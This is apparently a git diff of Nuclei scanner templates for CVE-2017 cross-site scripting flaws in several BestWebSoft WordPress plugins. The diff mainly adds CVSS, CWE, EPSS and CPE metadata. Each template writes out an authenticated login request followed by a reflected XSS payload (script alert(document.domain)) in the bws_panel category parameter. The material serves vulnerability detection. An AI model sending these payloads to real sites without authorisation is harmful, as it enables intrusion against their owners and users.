| - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/bws-pinterest/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "Pinterest by BestWebSoft")' +id: CVE-2017-18517 + +info: + name: Pinterest by BestWebSoft < 1.0.5 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The bws-pinterest plugin before 1.0.5 for WordPress has multiple XSS issues. + remediation: Fixed in version 1.0.5 + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18517 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18517 + - https://wordpress.org/plugins/bws-pinterest/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18517 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:pinterest:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: pinterest + framework: wordpress + publicwww-query: /wp-content/plugins/bws-pinterest/ + tags: cve,cve2017,wordpress,wpscan,bws-pinterest,wp-plugin,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/bws-pinterest/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Pinterest by BestWebSoft")' condition: and -# digest: 4a0a00473045022100b131f3088f8da80f8c15995c8ceac1f5346752e88c2c977d3c80179dee6d2bcf0220307aad330948e992bc964471049914493d134869cbd98fecafa726e4eb9b6442:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b131f3088f8da80f8c15995c8ceac1f5346752e88c2c977d3c80179dee6d2bcf0220307aad330948e992bc964471049914493d134869cbd98fecafa726e4eb9b6442:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18518.yaml b/http/cves/2017/CVE-2017-18518.yaml index 8e57b4d4e8..856b535f83 100644 --- a/http/cves/2017/CVE-2017-18518.yaml +++ b/http/cves/2017/CVE-2017-18518.yaml @@ -1,49 +1,57 @@ -id: CVE-2017-18518 - -info: - name: SMTP by BestWebSoft < 1.1.0 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The bws-smtp plugin before 1.1.0 for WordPress has multiple XSS issues. - remediation: Fixed in version 1.1.0 - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18518 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18518 - - https://wordpress.org/plugins/bws-smtp/#developers - classification: - cve-id: CVE-2017-18518 - metadata: - max-request: 2 - verified: true - publicwwww-query: "/wp-content/plugins/bws-smtp/" - tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-smtp,xss,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/bws-smtp/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "SMTP by BestWebSoft")' +id: CVE-2017-18518 + +info: + name: SMTP by BestWebSoft < 1.1.0 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The bws-smtp plugin before 1.1.0 for WordPress has multiple XSS issues. + remediation: Fixed in version 1.1.0 + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18518 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18518 + - https://wordpress.org/plugins/bws-smtp/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18518 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:smtp:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: smtp + framework: wordpress + publicwwww-query: /wp-content/plugins/bws-smtp/ + tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-smtp,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/bws-smtp/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "SMTP by BestWebSoft")' condition: and -# digest: 4a0a0047304502200757e83aa2d7271f341b8ed4b84361aebc773ff35f467d4653c3139892b1c50e0221008e3c0fc3ce38e29d193e709ac725127efe26cef6a33a480beb83101bb8896ce5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200757e83aa2d7271f341b8ed4b84361aebc773ff35f467d4653c3139892b1c50e0221008e3c0fc3ce38e29d193e709ac725127efe26cef6a33a480beb83101bb8896ce5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18527.yaml b/http/cves/2017/CVE-2017-18527.yaml index ae91f9274a..efdbbb2a44 100644 --- a/http/cves/2017/CVE-2017-18527.yaml +++ b/http/cves/2017/CVE-2017-18527.yaml @@ -1,48 +1,56 @@ -id: CVE-2017-18527 - -info: - name: Pagination by BestWebSoft < 1.0.7 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The pagination plugin before 1.0.7 for WordPress has multiple XSS issues. - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18527 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18527 - - https://wordpress.org/plugins/pagination/#developers - classification: - cve-id: CVE-2017-18527 - metadata: - max-request: 3 - verified: true - publicwww-query: "/wp-content/plugins/pagination/" - tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-pagination,bws-xss,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/pagination/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "Pagination by BestWebSoft")' +id: CVE-2017-18527 + +info: + name: Pagination by BestWebSoft < 1.0.7 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The pagination plugin before 1.0.7 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18527 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18527 + - https://wordpress.org/plugins/pagination/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18527 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:pagination:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: pagination + framework: wordpress + publicwww-query: "/wp-content/plugins/pagination/" + tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-pagination,bws-xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/pagination/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Pagination by BestWebSoft")' condition: and -# digest: 4b0a00483046022100d79908f7bada382cc7b4b568d28d392108706445043a67843940591c4e7442ce022100be88b9f5f11bcd05a57d00e41016987f6e100a5cd0da3078215b85e5ed9d13ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d79908f7bada382cc7b4b568d28d392108706445043a67843940591c4e7442ce022100be88b9f5f11bcd05a57d00e41016987f6e100a5cd0da3078215b85e5ed9d13ef:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18528.yaml b/http/cves/2017/CVE-2017-18528.yaml index c8e3c7fac4..dde6a7abde 100644 --- a/http/cves/2017/CVE-2017-18528.yaml +++ b/http/cves/2017/CVE-2017-18528.yaml @@ -1,48 +1,56 @@ -id: CVE-2017-18528 - -info: - name: PDF & Print by BestWebSoft < 1.9.4 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The pdf-print plugin before 1.9.4 for WordPress has multiple XSS issues. - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18528 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18528 - - https://wordpress.org/plugins/pdf-print/#developers - classification: - cve-id: CVE-2017-18528 - metadata: - max-request: 3 - verified: true - publicewww-query: "/wp-content/plugins/pdf-print/" - tags: cve,cve2017,wordpress,wp-plugin,bws-pdf-print,wpscan,xss,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/pdf-print/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "PDF & Print by BestWebSoft")' +id: CVE-2017-18528 + +info: + name: PDF & Print by BestWebSoft < 1.9.4 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The pdf-print plugin before 1.9.4 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18528 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18528 + - https://wordpress.org/plugins/pdf-print/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18528 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:pdf_\&_print:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: pdf_\&_print + framework: wordpress + publicewww-query: "/wp-content/plugins/pdf-print/" + tags: cve,cve2017,wordpress,wp-plugin,bws-pdf-print,wpscan,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/pdf-print/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "PDF & Print by BestWebSoft")' condition: and -# digest: 4b0a00483046022100bc8ac8382554ea0dfd6a9aab6a3b058dc9feca06200fc4eb08ce59756499b020022100a1cc719fb966c861c42df752d996f550ef99385a5e5d511306759d975888c46b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100bc8ac8382554ea0dfd6a9aab6a3b058dc9feca06200fc4eb08ce59756499b020022100a1cc719fb966c861c42df752d996f550ef99385a5e5d511306759d975888c46b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18529.yaml b/http/cves/2017/CVE-2017-18529.yaml index 868ef57de7..48ce2240eb 100644 --- a/http/cves/2017/CVE-2017-18529.yaml +++ b/http/cves/2017/CVE-2017-18529.yaml @@ -1,48 +1,56 @@ -id: CVE-2017-18529 - -info: - name: PromoBar by BestWebSoft < 1.1.1 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The promobar plugin before 1.1.1 for WordPress has multiple XSS issues. - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18529 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18529 - - https://wordpress.org/plugins/promobar/#developers - classification: - cve-id: CVE-2017-18529 - metadata: - max-request: 2 - verified: true - publicwww-query: "/wp-content/plugins/promobar/" - tags: cve,cve2017,wordpress,wp-plugin,bws-promobar,wpscan,xss,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/promobar/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "PromoBar by BestWebSoft")' +id: CVE-2017-18529 + +info: + name: PromoBar by BestWebSoft < 1.1.1 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The promobar plugin before 1.1.1 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18529 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18529 + - https://wordpress.org/plugins/promobar/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18529 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:promobar:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: promobar + framework: wordpress + publicwww-query: /wp-content/plugins/promobar/ + tags: cve,cve2017,wordpress,wp-plugin,bws-promobar,wpscan,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/promobar/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "PromoBar by BestWebSoft")' condition: and -# digest: 4a0a00473045022100a9919d13767b2eb2e8e75c9cc4ae95423367570b650b0a0a090ad2f9d1db0ae30220159ac24e3f38a876395d8007ec65299caf535e630cd40b65d456804eef4fc129:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a9919d13767b2eb2e8e75c9cc4ae95423367570b650b0a0a090ad2f9d1db0ae30220159ac24e3f38a876395d8007ec65299caf535e630cd40b65d456804eef4fc129:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18530.yaml b/http/cves/2017/CVE-2017-18530.yaml index 76abb10f00..4a70670ebd 100644 --- a/http/cves/2017/CVE-2017-18530.yaml +++ b/http/cves/2017/CVE-2017-18530.yaml @@ -1,48 +1,56 @@ -id: CVE-2017-18530 - -info: - name: Rating by BestWebSoft < 0.2 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The rating-bws plugin before 0.2 for WordPress has multiple XSS issues. - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18530 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18530 - - https://wordpress.org/plugins/rating-bws/#developers - classification: - cve-id: CVE-2017-18530 - metadata: - max-request: 3 - verified: true - publicwww-query: "/wp-content/plugins/rating-bws/" - tags: cve,cve2017,wordpress,wp-plugin,bws-rating,wpscan,xss,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/rating-bws/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "Rating by BestWebSoft")' +id: CVE-2017-18530 + +info: + name: Rating by BestWebSoft < 0.2 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The rating-bws plugin before 0.2 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18530 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18530 + - https://wordpress.org/plugins/rating-bws/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18530 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:rating:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: rating + framework: wordpress + publicwww-query: "/wp-content/plugins/rating-bws/" + tags: cve,cve2017,wordpress,wp-plugin,bws-rating,wpscan,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/rating-bws/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Rating by BestWebSoft")' condition: and -# digest: 490a0046304402207b93603d321d50a62dce92a72c0d990866ba06cecc20e87b9a34e9d3101bad720220661fe3d7316a025874cc87e9bf7468474ecea8daceb4fb1411646d9a3d42c44d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207b93603d321d50a62dce92a72c0d990866ba06cecc20e87b9a34e9d3101bad720220661fe3d7316a025874cc87e9bf7468474ecea8daceb4fb1411646d9a3d42c44d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18532.yaml b/http/cves/2017/CVE-2017-18532.yaml index 6c1e4559a2..3fe0eee994 100644 --- a/http/cves/2017/CVE-2017-18532.yaml +++ b/http/cves/2017/CVE-2017-18532.yaml @@ -1,48 +1,56 @@ -id: CVE-2017-18532 - -info: - name: Realty by BestWebSoft < 1.1.0 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The realty plugin before 1.1.0 for WordPress has multiple XSS issues. - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18532 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18532 - - https://wordpress.org/plugins/realty/#developers - classification: - cve-id: CVE-2017-18532 - metadata: - max-request: 2 - verified: true - publicwww-query: "/wp-content/plugins/realty/" - tags: cve,cve2017,wordpress,wp-plugin,bws-realty,wpscan,xss,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/realty/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "Realty by BestWebSoft")' +id: CVE-2017-18532 + +info: + name: Realty by BestWebSoft < 1.1.0 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The realty plugin before 1.1.0 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18532 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18532 + - https://wordpress.org/plugins/realty/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18532 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:realty:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: realty + framework: wordpress + publicwww-query: /wp-content/plugins/realty/ + tags: cve,cve2017,wordpress,wp-plugin,bws-realty,wpscan,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/realty/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Realty by BestWebSoft")' condition: and -# digest: 4a0a00473045022100d2f32002a388691ee00aeb60b30064c95ddff9cb1de2d1eaf4fa307ce22af50202203830bef75df3554071c2587e297eefd0ded6505031bec76ddf07fc1c0a279fc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d2f32002a388691ee00aeb60b30064c95ddff9cb1de2d1eaf4fa307ce22af50202203830bef75df3554071c2587e297eefd0ded6505031bec76ddf07fc1c0a279fc2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18537.yaml b/http/cves/2017/CVE-2017-18537.yaml index a4342f1e17..7fca97c86d 100644 --- a/http/cves/2017/CVE-2017-18537.yaml +++ b/http/cves/2017/CVE-2017-18537.yaml @@ -1,48 +1,56 @@ -id: CVE-2017-18537 - -info: - name: Visitors Online by BestWebSoft < 1.0.0 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The visitors-online plugin before 1.0.0 for WordPress has multiple XSS issues. - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18537 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18537 - - https://wordpress.org/plugins/visitors-online/#developers - classification: - cve-id: CVE-2017-18537 - metadata: - max-request: 3 - verified: true - publicewww-query: "/wp-content/plugins/visitors-online/" - tags: cve,cve2017,wordpress,wp-plugin,bws-visitors-online,wpscan,xss,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/visitors-online/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "Visitors Online by")' +id: CVE-2017-18537 + +info: + name: Visitors Online by BestWebSoft < 1.0.0 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The visitors-online plugin before 1.0.0 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18537 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18537 + - https://wordpress.org/plugins/visitors-online/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18537 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:visitors_online:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: visitors_online + framework: wordpress + publicewww-query: "/wp-content/plugins/visitors-online/" + tags: cve,cve2017,wordpress,wp-plugin,bws-visitors-online,wpscan,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/visitors-online/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Visitors Online by")' condition: and -# digest: 4b0a00483046022100a12c9b4699e90c706bc671d293a7fe6f094e03c2312968cbf87bc59d96c1e577022100e1ac2761907b5bf2a56e23184f87dafb78f1c12c08054c19fe1ce401ed1eb889:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100a12c9b4699e90c706bc671d293a7fe6f094e03c2312968cbf87bc59d96c1e577022100e1ac2761907b5bf2a56e23184f87dafb78f1c12c08054c19fe1ce401ed1eb889:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18542.yaml b/http/cves/2017/CVE-2017-18542.yaml index 7838828d66..9457d1e64b 100644 --- a/http/cves/2017/CVE-2017-18542.yaml 